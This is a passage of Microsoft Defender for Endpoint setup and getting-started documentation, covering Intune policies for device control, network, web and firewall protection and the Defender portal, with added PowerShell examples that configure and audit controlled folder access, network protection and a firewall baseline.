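# access locally and verify that the protected-folder and allowed-app lists took effect.
# Paths below are constructed placeholders.
$ProtectedFolders = @('C:\Finance\Ledgers', 'D:\Shares\Contracts')        # assumed paths
$AllowedApps      = @('C:\Program Files\LineOfBusiness\lob.exe')           # assumed path

function Set-ControlledFolderAccess {
    param(
        [string[]] $Folders,
        [string[]] $Apps,
        [ValidateSet('Enabled', 'AuditMode')] [string] $Mode = 'AuditMode'
    )
    # AuditMode records what would have been blocked without blocking it, which lets a
    # pilot surface legitimate apps that need to be on the allowed list before enforcing.
    Set-MpPreference -EnableControlledFolderAccess $Mode
    # Add-MpPreference appends to the existing lists instead of replacing them, so
    # Windows' own default protected folders (Documents, Pictures, ...) stay protected.
    if ($Folders) { Add-MpPreference -ControlledFolderAccessProtectedFolders $Folders }
    if ($Apps)    { Add-MpPreference -ControlledFolderAccessAllowedApplications $Apps }
}

function Test-ControlledFolderAccess {
    param([string[]] $Folders, [string[]] $Apps)
    $pref = Get-MpPreference
    $modeName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode';
                   3 = 'BlockDiskModificationOnly'; 4 = 'AuditDiskModificationOnly' }
    $protected = @($pref.ControlledFolderAccessProtectedFolders)
    $allowed   = @($pref.ControlledFolderAccessAllowedApplications)
    [pscustomobject]@{
        Mode           = $modeName[[int]$pref.EnableControlledFolderAccess]
        ProtectedCount = $protected.Count
        AllowedCount   = $allowed.Count
        # Anything listed here was requested but is not in the effective configuration.
        MissingFolders = @($Folders | Where-Object { $_ -notin $protected })
        MissingApps    = @($Apps    | Where-Object { $_ -notin $allowed })
    }
}

Set-ControlledFolderAccess -Folders $ProtectedFolders -Apps $AllowedApps -Mode AuditMode
Test-ControlledFolderAccess -Folders $ProtectedFolders -Apps $AllowedApps | Format-List
```

Keep the allowed-application list short and specific: each entry is a path that controlled folder access will trust to modify every protected folder, so a broad entry such as a scripting host defeats the purpose of the control.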

Device control
You can configure Defender for Endpoint to block or allow removable devices and files
on removable devices. We recommend using Intune to configure your device control
settings.

1. Go to the Intune admin center (https://endpoint.microsoft.com ) and sign in.

2. Select Devices > Configuration profiles > Create profile.

3. For Platform, select Windows 10 and later, and for Profile type, select Templates.

Under Template name, select Administrative Templates, and then choose Create.

4. On the Basics tab, name the policy and add a description. Select Next.

5. On the Configuration settings tab, select All Settings. Then in the search box, type
Removable to see all the settings that pertain to removable devices.

6. Select an item in the list, such as All Removable Storage classes: Deny all access,
to open its flyout pane. The flyout for each setting explains what happens when it
is enabled, disabled, or not configured. Select a setting, and then choose OK.

7. Repeat step 6 for each setting that you want to configure. Then choose Next.

8. On the Scope tags tab, if your organization is using scope tags, choose + Select
scope tags, and then select the tags you want to use. Then, choose Next.

To learn more about scope tags, see Use role-based access control (RBAC) and
scope tags for distributed IT.

9. On the Assignments tab, select Add all users and + Add all devices, and then
choose Next. (You can alternately specify specific groups of users or devices.)

10. On the Review + create tab, review the settings for your policy, and then choose
Create. The policy will be applied to any endpoints that were onboarded to
Defender for Endpoint shortly.

Tip

For more information, see How to control USB devices and other removable
media using Microsoft Defender for Endpoint.

Network protection
With network protection, you can help protect your organization against dangerous
domains that might host phishing scams, exploits, and other malicious content on the
Internet. We recommend using Intune to turn on network protection.

1. Go to the Intune admin center (https://endpoint.microsoft.com ) and sign in.

2. Select Devices > Configuration profiles > Create profile.

3. For Platform, select Windows 10 and later, and for Profile type, select Templates.

Under Template name, select Endpoint protection, and then choose Create.

4. On the Basics tab, name the policy and add a description. Select Next.

5. On the Configuration settings tab, expand Microsoft Defender Exploit Guard, and
then expand Network filtering.

Set Network protection to Enable. (You can alternately choose Audit to see how
network protection will work in your environment at first.)

Then choose Next.

6. On the Assignments tab, select Add all users and + Add all devices, and then
choose Next. (You can alternately specify specific groups of users or devices.)

7. On the Applicability Rules tab, set up a rule. The profile you are configuring will be
applied only to devices that meet the combined criteria you specify.

For example, you might choose to assign the policy to endpoints that are running
a certain OS edition only.

Then choose Next.

8. On the Review + create tab, review the settings for your policy, and then choose
Create. The policy will be applied to any endpoints that were onboarded to
Defender for Endpoint shortly.

Tip

You can use other methods, such as Windows PowerShell or Group Policy, to enable
network protection. To learn more, see Turn on network protection.
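Step 5 suggests starting in Audit mode to see how network protection behaves in your environment, and the tip notes that PowerShell can set it as well. The following script is an added example, not part of the Microsoft documentation, that turns network protection on in audit mode, reads the value back, and summarizes the resulting audit events so the switch to block mode can be made on evidence. The event summary helper covers the attack surface reduction rules and controlled folder access features from the earlier sections too, since all three write to the same Defender operational log. Run it elevated on a Windows device.

```powershell
# Added example (not from the Microsoft documentation): enable network protection in
# audit mode with the Defender module, confirm the effective setting, and count the
# Exploit Guard audit/block events recorded since, so a pilot can judge the impact of
# moving to block mode.

function Set-NetworkProtectionMode {
    param([ValidateSet('Disabled', 'Enabled', 'AuditMode')] [string] $Mode)
    Set-MpPreference -EnableNetworkProtection $Mode
    # Read the value back rather than trusting that the call took effect: a Group Policy
    # or Intune setting can override the local preference.
    $modeName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode' }
    $actual = $modeName[[int](Get-MpPreference).EnableNetworkProtection]
    if ($actual -ne $Mode) {
        throw "Network protection is '$actual', expected '$Mode' (a policy may be overriding the local setting)"
    }
    $actual
}

# Event IDs written to Microsoft-Windows-Windows Defender/Operational by Exploit Guard
# features. Network protection uses 1125 for audit and 1126 for block.
$ExploitGuardEventNames = @{
    1121 = 'ASR rule blocked';                1122 = 'ASR rule audited'
    1123 = 'Controlled folder access blocked'; 1124 = 'Controlled folder access audited'
    1125 = 'Network protection audited';      1126 = 'Network protection blocked'
}

function Get-ExploitGuardEventSummary {
    param([int] $Days = 7, [int[]] $Ids = @(1121, 1122, 1123, 1124, 1125, 1126))
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = $Ids
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue   # no matching events is not an error here

    # One row per event ID: how often each feature fired and when it last did.
    $events | Group-Object Id | ForEach-Object {
        [pscustomobject]@{
            EventId = [int]$_.Name
            Meaning = $ExploitGuardEventNames[[int]$_.Name]
            Count   = $_.Count
            Latest  = ($_.Group | Sort-Object TimeCreated -Descending | Select-Object -First 1).TimeCreated
        }
    }
}

# Pilot sequence: audit, review the events for a week, then enforce.
Set-NetworkProtectionMode -Mode AuditMode
Get-ExploitGuardEventSummary -Days 7 | Format-Table -AutoSize
# After review:  Set-NetworkProtectionMode -Mode Enabled
```

A steady stream of 1125 events from a line-of-business application is the signal to investigate its destinations before enforcing; once block mode is on, the same destinations would appear as 1126 events and the application would fail.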

Web protection
With web protection, you can protect your organization's devices from web threats and
unwanted content. Your web protection includes web threat protection and web content
filtering. Configure both sets of capabilities. We recommend using Intune to configure
your web protection settings.

Configure web threat protection


1. Go to the Intune admin center (https://endpoint.microsoft.com ), and sign in.

2. Choose Endpoint security > Attack surface reduction, and then choose + Create
policy.

3. Select a platform, such as Windows 10 and later, select the Web protection profile,
and then choose Create.

4. On the Basics tab, specify a name and description, and then choose Next.

5. On the Configuration settings tab, expand Web Protection, specify the settings in
the following table, and then choose Next.

Enable network protection: Set to Enabled. Prevents users from visiting malicious
sites or domains. Alternately, you can set network protection to Audit mode to see
how it will work in your environment. In audit mode, network protection does not
prevent users from visiting sites or domains, but it does track detections as events.

Require SmartScreen for Microsoft Edge Legacy: Set to Yes. Helps protect users from
potential phishing scams and malicious software.

Block malicious site access: Set to Yes. Prevents users from bypassing warnings about
potentially malicious sites.

Block unverified file download: Set to Yes. Prevents users from bypassing the
warnings and downloading unverified files.

6. On the Scope tags tab, if your organization is using scope tags, choose + Select
scope tags, and then select the tags you want to use. Then, choose Next.

To learn more about scope tags, see Use role-based access control (RBAC) and
scope tags for distributed IT.

7. On the Assignments tab, specify the users and devices to receive the web
protection policy, and then choose Next.

8. On the Review + create tab, review your policy settings, and then choose Create.

Tip

To learn more about web threat protection, see Protect your organization against
web threats.

Configure web content filtering

1. Go to the Microsoft Defender portal (https://security.microsoft.com/ ) and sign in.

2. Choose Settings > Endpoints.

3. Under Rules, choose Web content filtering, and then choose + Add policy.

4. In the Add policy flyout, on the General tab, specify a name for your policy, and
then choose Next.

5. On the Blocked categories tab, select one or more categories that you want to block,
and then choose Next.

6. On the Scope tab, select the device groups you want to receive this policy, and
then choose Next.

7. On the Summary tab, review your policy settings, and then choose Save.

Tip

To learn more about configuring web content filtering, see Web content filtering.

Network firewall
Network firewall helps reduce the risk of network security threats. Your security team
can set rules that determine which traffic is permitted to flow to or from your
organization's devices. We recommend using Intune to configure your network firewall.

To configure basic firewall settings, follow these steps:

1. Go to the Intune admin center (https://endpoint.microsoft.com ), and sign in.

2. Choose Endpoint security > Firewall, and then choose + Create Policy.

3. Select a platform, such as Windows 10 and later, select the Microsoft Defender
Firewall profile, and then choose Create.

4. On the Basics tab, specify a name and description, and then choose Next.

5. Expand Microsoft Defender Firewall, and then scroll down to the bottom of the
list.

6. Set each of the following settings to Yes:

Turn on Microsoft Defender Firewall for domain networks
Turn on Microsoft Defender Firewall for private networks
Turn on Microsoft Defender Firewall for public networks

Review the list of settings under each of domain networks, private networks, and
public networks. You can leave them set to Not configured, or change them to suit
your organization's needs.

Then choose Next.

7. On the Scope tags tab, if your organization is using scope tags, choose + Select
scope tags, and then select the tags you want to use. Then, choose Next.

To learn more about scope tags, see Use role-based access control (RBAC) and
scope tags for distributed IT.

8. On the Assignments tab, select Add all users and + Add all devices, and then
choose Next. (You can alternately specify specific groups of users or devices.)

9. On the Review + create tab, review your policy settings, and then choose Create.

Tip

Firewall settings are detailed and can seem complex. Refer to Best practices for
configuring Windows Defender Firewall.
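Step 6 turns the firewall on for the domain, private, and public profiles and leaves the per-profile settings to you. The following script is an added example, not part of the Microsoft documentation, that applies a minimal baseline for those three profiles with the built-in NetSecurity module (firewall on, unsolicited inbound traffic blocked, dropped packets logged) and then reports any profile that does not match it. The baseline values and the log size are assumptions for illustration; run it elevated on a Windows device.

```powershell
# Added example (not from the Microsoft documentation): apply a firewall baseline to
# the three profiles from step 6 and report drift from it. Baseline values are assumed.
$Profiles = 'Domain', 'Private', 'Public'

function Set-FirewallBaseline {
    # Firewall on for every profile, block inbound connections that no rule allows,
    # allow outbound, and log dropped packets so blocked traffic can be investigated.
    Set-NetFirewallProfile -Profile $Profiles `
        -Enabled True `
        -DefaultInboundAction Block `
        -DefaultOutboundAction Allow `
        -LogBlocked True `
        -LogFileName '%SystemRoot%\System32\LogFiles\Firewall\pfirewall.log' `
        -LogMaxSizeKilobytes 16384
}

function Test-FirewallBaseline {
    foreach ($p in Get-NetFirewallProfile -Profile $Profiles) {
        $problems = @()
        if ($p.Enabled -ne 'True')               { $problems += 'firewall disabled' }
        if ($p.DefaultInboundAction -ne 'Block') { $problems += "inbound default is $($p.DefaultInboundAction)" }
        if ($p.LogBlocked -ne 'True')            { $problems += 'dropped packets not logged' }

        [pscustomobject]@{
            Profile  = $p.Name
            Enabled  = $p.Enabled
            Inbound  = $p.DefaultInboundAction
            Outbound = $p.DefaultOutboundAction
            Status   = if ($problems) { $problems -join '; ' } else { 'OK' }
        }
    }
}

Set-FirewallBaseline
Test-FirewallBaseline | Format-Table -AutoSize
```

Because Get-NetFirewallProfile returns the effective configuration, the same Test-FirewallBaseline check can be run on devices that received the Intune policy instead of the local Set call, which is a quick way to confirm that the profile reached them.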

Application control

Windows Defender Application Control (WDAC) helps protect your Windows endpoints
by only allowing trusted applications and processes to run. Most organizations use a
phased deployment of WDAC. That is, most organizations don't roll out WDAC across all
Windows endpoints at first. In fact, depending on whether your organization's Windows
endpoints are fully managed, lightly managed, or "Bring Your Own Device" endpoints,
you might deploy WDAC on all or some endpoints.

To help with planning your WDAC deployment, see the following resources:

Application Control for Windows
Windows Defender Application Control policy design decisions
Windows Defender Application Control deployment in different scenarios: types of
devices

Next steps
Now that you have gone through the setup and configuration process, your next step is
to get started using Defender for Endpoint.

Get started with Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Get started with Microsoft Defender for
Endpoint Plan 1
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

The Microsoft Defender portal (https://security.microsoft.com ) enables you to view
information about detected threats, manage your alerts and incidents, take any needed
action on detected threats, and manage devices. The Microsoft Defender portal is where
you can get started interacting with the threat protection capabilities you get with
Defender for Endpoint Plan 1. The following sections describe how to get started:

The Microsoft Defender portal
Viewing and managing incidents & alerts
Managing devices
Viewing reports

The Microsoft Defender portal

The Microsoft Defender portal (https://security.microsoft.com ) is where you view
alerts, manage devices, and view reports. When you sign into the Microsoft Defender
portal, you start with the Home page, which resembles the following image:


The Home page provides your security team with a snapshot aggregate view of alerts,
device status, and threats detected. Microsoft Defender XDR is set up so that your
security operations team can find the information they're looking for quickly and easily.

Note

Our examples shown in this article might differ from what you see in your Microsoft
Defender portal. What you see in your portal depends on your licenses and
permissions. In addition, your security team can customize your organization's
portal by adding, removing, and rearranging cards.

Cards highlight key information and include recommendations

The Home page includes cards, such as the Active incidents card shown in the following
image:

The card provides you with information at a glance, along with a link or button that you
can select to view more detailed information. Referring to our example Active incidents
card, we can select View all incidents to navigate to our list of incidents.

Navigation bar makes it easy to find alerts, the Action center, and more

The navigation bar on the left side of the screen enables you to move easily between
incidents, alerts, the Action center, reports, and settings. The following table describes
the navigation bar.

Home: Navigates to the Home page of the Microsoft Defender portal.

Incidents & alerts: Expands to show Incidents and Alerts.

Incidents & alerts > Incidents: Navigates to the Incidents list. Incidents are created
when alerts are triggered and/or threats are detected. By default, the Incidents list
displays data for the last 30 days, with the most recent incident listed first. To learn
more, see Incidents.

Incidents & alerts > Alerts: Navigates to the Alerts list (also referred to as the Alerts
queue). Alerts are triggered when a suspicious or malicious file, process, or behavior is
detected. By default, the Alerts list displays data for the last 30 days, with the most
recent alert listed first. To learn more, see Alerts.

Incidents & alerts > Email & collaboration alerts: If your subscription includes
Microsoft Defender for Office 365, alerts are generated when potential threats are
detected in email and Office files.

Actions & submissions > Action center: Navigates to the Action center, which tracks
remediation and manual response actions. The Action center tracks activities like these:
- Microsoft Defender Antivirus encounters a malicious file and then blocks/removes
that file.
- Your security team isolates a device.
- Defender for Endpoint detects and quarantines a file.
To learn more, see Action center.

Actions & submissions > Submissions: Navigates to the unified submissions portal,
where admins can submit files to Microsoft for review. To learn more, see Submit files
in Microsoft Defender for Endpoint.

Secure score: Displays a representation of your organization's security posture along
with a list of recommended actions and metrics. To learn more, see Microsoft Secure
Score.

Learning hub: Navigates to a list of learning paths that you can access to learn more
about Microsoft 365 security capabilities.

Trials: Navigates to a list of free Microsoft 365 trial subscriptions you can start.
Starting a trial helps you make informed decisions about purchases or upgrades.
Certain terms and conditions apply. See Microsoft 365 trial terms and conditions.

Partner catalog: If you're looking for a Microsoft partner to help you with your
security and other settings, check out the lists of partners in this catalog.

Assets > Devices: Navigates to your list of devices that are onboarded to Defender for
Endpoint. Provides information about devices, such as their exposure and risk levels.
To learn more, see Device inventory.

Endpoints > Configuration management > Dashboard: Navigates to a dashboard with
cards that show your current security state with links to improve your score, set up
your capabilities, onboard devices, and learn more about your capabilities.

Reports: Navigates to your reports, such as your Threat protection report, Device
health and compliance report and your Web protection report.

Health: Includes links to the Service health and Message center.

Health > Service health: Navigates to the Service health page in the Microsoft 365
admin center. This page enables you to view health status across all the services
available with your organization's subscriptions.

Health > Message center: Navigates to the Message center in the Microsoft 365 admin
center. The Message center provides information about planned changes. Each message
describes what's coming, how it might affect users, and how to manage changes.

Permissions & roles: Enables you to grant permissions to use the Microsoft Defender
portal. Permissions are granted through roles in Microsoft Entra ID. Select a role, and
a flyout pane appears. The flyout contains a link to Microsoft Entra ID where you can
add or remove members in a role group. To learn more, see Manage portal access using
role-based access control.

Settings: Navigates to general settings for your Microsoft Defender portal (listed as
Security center) and Defender for Endpoint (listed as Endpoints). To learn more, see
Settings.

More resources: Displays a list of more portals and centers, such as Microsoft Entra ID
and the Microsoft Purview compliance portal. To learn more, see Microsoft security
portals and admin centers.

Tip

To learn more, see the Microsoft Defender portal overview.

View and manage incidents & alerts

When you sign into the Microsoft Defender portal, make sure to view and manage your
incidents and alerts. Start with your Incidents list. The following image shows a list of
incidents, including one with high severity, and another with medium severity.

Select an incident to view details about the incident. Details include what alerts were
triggered, how many devices and users were affected, and other details. The following
image shows an example of incident details.

Use the Alerts, Devices, and Users tabs to view more information, such as the alerts that
were triggered, devices that were affected, and user accounts that were affected. From
there, you can take manual response actions, such as isolating a device, stopping and
quarantining a file, and so on.

Tip

To learn more about using the Incident view, see Manage incidents.

Manage devices
To view and manage your organization's devices, in the navigation bar, under Assets,
select Devices. You see a list of devices. The list includes devices for which alerts were
generated. By default, the data shown is for the past 30 days, with the most recent items
listed first. Select a device to view more information about it. A flyout pane opens, as
shown in the following image:

The flyout pane displays details, such as any active alerts for the device, and includes
links to take action, such as isolating a device.

If there are active alerts on the device, you can view them in the flyout pane. Select an
individual alert to view more details about it. Or, take an action, such as Isolate device,
so you can investigate the device further while minimizing the risk of infecting other
devices.

Tip

To learn more, see Investigate devices in the Defender for Endpoint devices list.

View reports
In Defender for Endpoint Plan 1, several reports are available in the Microsoft Defender
portal. To access your reports, follow these steps:

1. Go to the Microsoft Defender portal (https://security.microsoft.com ) and sign in.

2. In the navigation bar, choose Reports.

3. Select a report in the list. Reports include:

Threat protection report
Device health report
Web protection report

Tip

For more information, see Threat protection reports.

Threat protection report

To access your Threat protection report, in the Microsoft Defender portal, choose
Reports, and then choose Threat protection. The Threat Protection report shows alert
trends, status, categories, and more. Views are arranged in two columns: Alert trends
and Alert status, as shown in the following image:

Scroll down to see all the views in each list.

By default, the views in the Alert trends column display data for the past 30 days,
but you can set a view to display data for the last three months, last six months, or
a custom time range (up to 180 days).
The views in the Alert status column are a snapshot for the previous business day.

Tip

To learn more, see Threat protection report in Defender for Endpoint.

Device health report

To access your Device health report, in the Microsoft Defender portal, choose Reports,
and then choose Device health. The Device health report shows health state and
antivirus across devices in your organization. Similar to the Threat protection report,
views are arranged in two columns: Device trends and Device summary, as shown in
the following image:

Scroll down to see all the views in each list. By default, the views in the Device trends
column display data for the past 30 days, but you can change a view to display data for
the last three months, last six months, or a custom time range (up to 180 days). The
Device summary views are snapshots for the previous business day.

Tip

To learn more, see Device health.

Web protection report

To access your Web protection report, in the Microsoft Defender portal, choose Reports,
and then choose Web protection. The Web protection report shows detections over
time, such as malicious URLs and attempts to access blocked URLs, as shown in the
following image:

Scroll down to see all the views in the Web protection report. Some views include links
that enable you to view more details, configure your threat protection features, and
even manage indicators that serve as exceptions in Defender for Endpoint.

Tip

To learn more, see Web protection.

Next steps

Manage Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Microsoft Defender for Endpoint for US Government customers
Article • 11/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Microsoft Defender for Endpoint for US Government customers, built in the Azure US
Government environment, uses the same underlying technologies as Defender for
Endpoint in Azure Commercial.

This offering is available to GCC, GCC High, and DoD customers and is based on the
same prevention, detection, investigation, and remediation as the commercial version.
However, there are some differences in the availability of capabilities for this offering.

Note

If you are a GCC customer using Defender for Endpoint in Commercial, please refer
to the public documentation pages.

Licensing requirements
Microsoft Defender for Endpoint for US Government customers requires one of the
following Microsoft volume licensing offers:

Desktop licensing

GCC:
Microsoft 365 GCC G5
Microsoft 365 G5 Security GCC
Microsoft Defender for Endpoint - GCC
Windows 10 Enterprise E5 GCC

GCC High:
Microsoft 365 E5 for GCC High
Microsoft 365 G5 Security for GCC High
Microsoft Defender for Endpoint for GCC High
Windows 10 Enterprise E5 for GCC High

DoD:
Microsoft 365 G5 for DOD
Microsoft 365 G5 Security for DOD
Microsoft Defender for Endpoint for DOD
Windows 10 Enterprise E5 for DOD

Server licensing

GCC:
Microsoft Defender for Endpoint Server GCC
Microsoft Defender for servers

GCC High:
Microsoft Defender for Endpoint Server for GCC High
Microsoft Defender for servers - Government

DoD:
Microsoft Defender for Endpoint Server for DOD
Microsoft Defender for servers - Government

Portal URLs
The following are the Microsoft Defender for Endpoint portal URLs for US Government
customers:

Customer type Portal URL

GCC https://security.microsoft.com

GCC High https://security.microsoft.us

DoD https://security.apps.mil

Note

If you are a GCC customer and in the process of moving from Microsoft Defender
for Endpoint commercial to GCC, use https://transition.security.microsoft.com
to access your Microsoft Defender for Endpoint commercial data.

Endpoint versions

Standalone OS versions
The following OS versions are supported:

OS version, with cloud-specific notes for GCC, GCC High, and DoD where the table gives them

Windows 11
Windows 10, version 21H1 and above
Windows 10, version 20H2 (with KB4586853 ¹)
Windows 10, version 2004 (with KB4586853 ¹) - GCC, GCC High, DoD: Deprecated, please upgrade
Windows 10, version 1909 (with KB4586819 ¹) - GCC, GCC High, DoD: Deprecated, please upgrade
Windows 10, version 1903 (with KB4586819 ¹) - GCC, GCC High, DoD: Deprecated, please upgrade
Windows 10, version 1809 (with KB4586839 ¹) - GCC, GCC High, DoD: Deprecated, please upgrade
Windows 10, version 1803 (with KB4598245 ¹) - GCC, GCC High, DoD: Deprecated, please upgrade
Windows 10, version 1709 - GCC: Won't be supported; GCC High: with KB4499147 ¹, Deprecated, please upgrade; DoD: Won't be supported
Windows 10, version 1703 and earlier - GCC, GCC High, DoD: Won't be supported
Windows Server 2022
Windows Server 2019 (with KB4586839 ¹)
Windows Server 2016 (Modern) ²
Windows Server 2012 R2 (Modern) ²
Windows Server 2016 (Legacy) ³
Windows Server 2012 R2 (Legacy) ³
Windows Server 2008 R2 SP1 (Legacy) ³
Windows 8.1 Enterprise (Legacy) ³
Windows 8 Pro (Legacy) ³
Windows 7 SP1 Enterprise (Legacy) ³
Windows 7 SP1 Pro (Legacy) ³
Linux
macOS
Android
iOS

Footnotes

¹ The patch must be deployed prior to device onboarding in order to configure
Defender for Endpoint to the correct environment.

² Learn about the unified modern solution for Windows Server 2016 and 2012 R2. If you
have previously onboarded your servers using MMA, follow the guidance provided in
Server migration to migrate to the new solution.

³ When using Microsoft Monitoring Agent, you'll need to choose "Azure US
Government" under "Azure Cloud" if using the setup wizard, or, if using a command line
or a script, set the "OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE" parameter to 1.
The minimum supported MMA version is 10.20.18029 (March 2020).

OS versions when using Microsoft Defender for servers
The following OS versions are supported when using Microsoft Defender for servers:

OS version GCC GCC High DoD

Windows Server 2022

Windows Server 2019

Windows Server 2016

Windows Server 2012 R2

Windows Server 2008 R2 SP1

Required connectivity settings

If a proxy or firewall is blocking all traffic by default and allowing only specific domains
through, add the domains listed in the downloadable sheet to the allowed domains list.

The following downloadable spreadsheet lists the services and their associated URLs
your network must be able to connect to. Verify there are no firewall or network-filtering
rules that would deny access to these URLs, or create an allow rule specifically for them.

Microsoft Defender for Endpoint URL list for commercial customers: Spreadsheet of
specific DNS records for service locations, geographic locations, and OS for
commercial customers. Download the spreadsheet here.

Microsoft Defender for Endpoint URL list for Gov/GCC/DoD customers: Spreadsheet of
specific DNS records for service locations, geographic locations, and OS for
Gov/GCC/DoD customers. Download the spreadsheet here.

For more information, see Configure device proxy and Internet connectivity settings.

Note

The spreadsheet contains commercial URLs as well; make sure you check the "US
Gov" tabs. When filtering, look for the records labeled as "US Gov" and your specific
cloud under the geography column.

API
Instead of the public URIs listed in our API documentation, you'll need to use the
following URIs:

Endpoint type              GCC                                          GCC High & DoD
Login                      https://login.microsoftonline.com            https://login.microsoftonline.us
Defender for Endpoint API  https://api-gcc.securitycenter.microsoft.us  https://api-gov.securitycenter.microsoft.us

Feature parity with commercial

Defender for Endpoint for US Government customers doesn't have complete parity with
the commercial offering. While our goal is to deliver all commercial features and
functionality to our US Government customers, there are some capabilities not yet
available we want to highlight.

These are the known gaps:

Feature name GCC GCC High DoD

Microsoft Secure Score ¹

Microsoft Threat Experts

Microsoft Defender for Endpoint Security Configuration Management

Note

¹ While Microsoft Secure Score is available for GCC customers, some security
recommendations aren't available.

These are the features and known gaps for Mobile Threat Defense (Microsoft Defender
for Endpoint on Android & iOS):

Feature name GCC GCC High DoD

Reports: Web content filtering

Reports: Device health

Web Protection (Anti-Phishing and custom indicators)

Malware Protection (Android-Only)

Jailbreak Detection (iOS-Only)

Conditional Access/Conditional Launch

Support for MAM

Privacy Controls

Microsoft Defender Vulnerability Management core capabilities
(included in Defender for Endpoint Plan 2) ¹

Microsoft Defender Vulnerability Management premium capabilities

Note

¹ The Defender Vulnerability Management report inaccuracy functionality isn't
available for GCC customers.

Microsoft Defender for Endpoint on other platforms
Article • 02/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1 and Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft has been on a journey to extend its industry leading endpoint security
capabilities beyond Windows and Windows Server to macOS, Linux, Android, and iOS.

Organizations face threats across a variety of platforms and devices. Our teams have
committed to building security solutions not just for Microsoft, but also from Microsoft
to enable our customers to protect and secure their heterogeneous environments. We're
listening to customer feedback and partnering closely with our customers to build
solutions that meet their needs.

With Microsoft Defender for Endpoint, customers benefit from a unified view of all
threats and alerts in the Microsoft Defender portal, across Windows and non-Windows
platforms, enabling them to get a full picture of what's happening in their environment,
which empowers them to more quickly assess and respond to threats.

Note

Microsoft Defender for Endpoint doesn't support native compute workloads in
Amazon Web Services (AWS) and Google Cloud Platform (GCP).

Microsoft Defender for Endpoint on macOS

Microsoft Defender for Endpoint on macOS offers antivirus, endpoint detection and
response (EDR), and vulnerability management capabilities for the three latest released
versions of macOS. Customers can deploy and manage the solution through Microsoft
Intune and Jamf. Just like with Microsoft Office applications on macOS, Microsoft Auto
Update is used to manage Microsoft Defender for Endpoint on Mac updates. For
information about the key features and benefits, read our announcements.
For more details on how to get started, visit the Defender for Endpoint on macOS
documentation.

Note

The following capabilities are not currently supported on macOS endpoints:

Security Management for Microsoft Defender for Endpoint

Microsoft Defender for Endpoint on Linux

Microsoft Defender for Endpoint on Linux offers preventative antivirus (AV), endpoint
detection and response (EDR), and vulnerability management capabilities for Linux
servers. This includes a full command line experience to configure and manage the
agent, initiate scans, and manage threats. We support recent versions of the six most
common Linux Server distributions: RHEL 7.2+, CentOS Linux 7.2+, Ubuntu 16 LTS or
higher LTS, SLES 12+, Debian 9+, and Oracle Linux 7.2. Microsoft Defender for Endpoint
on Linux can be deployed and configured using Puppet, Ansible, or your existing
Linux configuration management tool. For information about the key features and
benefits, read our announcements.

For more details on how to get started, visit the Microsoft Defender for Endpoint on
Linux documentation.

Note

The following capabilities are not currently supported on Linux endpoints:

Data loss prevention
Security Management for Microsoft Defender for Endpoint

Microsoft Defender for Endpoint on Android

Microsoft Defender for Endpoint on Android is our mobile threat defense solution for
devices running Android 6.0 and higher. Both Android Enterprise (Work Profile) and
Device Administrator modes are supported. On Android, we offer web protection, which
includes anti-phishing, blocking of unsafe connections, and setting of custom indicators.
The solution scans for malware and potentially unwanted applications (PUA) and offers
additional breach prevention capabilities through integration with Microsoft Intune and
Conditional Access. For information about the key features and benefits, read our
announcements.

For more details on how to get started, visit the Microsoft Defender for Endpoint on
Android documentation.

Microsoft Defender for Endpoint on iOS

Microsoft Defender for Endpoint on iOS is our mobile threat defense solution for
devices running iOS 11.0 and higher. Devices that are registered within a customer's
tenant (enrolled or unenrolled) are supported. Both supervised and unsupervised
enrolled devices are supported. On iOS, we offer web protection, which includes
anti-phishing, blocking unsafe connections and setting custom indicators, and jailbreak
detection. For more information about the key features and benefits, read our
announcements.

For more details on how to get started, visit the Microsoft Defender for Endpoint on iOS
documentation.

Licensing requirements
Eligible Licensed Users may use Microsoft Defender for Endpoint on up to five
concurrent devices. Microsoft Defender for Endpoint is also available for purchase from
a Cloud Solution Provider (CSP).

Customers can obtain Microsoft Defender for Endpoint on macOS through a standalone
Microsoft Defender for Endpoint license, as part of Microsoft 365 A5/E5, or Microsoft
365 Security.

Recently announced capabilities of Microsoft Defender for Endpoint on Android and iOS
are included in the above mentioned offers as part of the five qualified devices for
eligible licensed users.

Defender for Endpoint on Linux is available through the Defender for Endpoint Server
SKU that is available for both commercial and education customers.

Please contact your account team or CSP for pricing and additional eligibility
requirements.

Microsoft Defender for Endpoint on Linux
Article • 11/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This topic describes how to install, configure, update, and use Microsoft Defender for
Endpoint on Linux.

Caution

Running other third-party endpoint protection products alongside Microsoft
Defender for Endpoint on Linux is likely to lead to performance problems and
unpredictable side effects. If non-Microsoft endpoint protection is an absolute
requirement in your environment, you can still safely take advantage of Defender
for Endpoint on Linux EDR functionality after configuring the antivirus functionality
to run in Passive mode.

How to install Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint for Linux includes anti-malware and endpoint
detection and response (EDR) capabilities.

Prerequisites
Access to the Microsoft Defender portal

Linux distribution using the systemd system manager

Note
Linux distributions must use the systemd system manager, except for RHEL/CentOS 6.x,
which support both SystemV and Upstart.

Beginner-level experience in Linux and BASH scripting

Administrative privileges on the device (in case of manual deployment)

Note

The Microsoft Defender for Endpoint on Linux agent is independent of the OMS agent.
Microsoft Defender for Endpoint relies on its own independent telemetry pipeline.

Installation instructions
There are several methods and deployment tools that you can use to install and
configure Microsoft Defender for Endpoint on Linux.

In general, you need to take the following steps:

Ensure that you have a Microsoft Defender for Endpoint subscription.

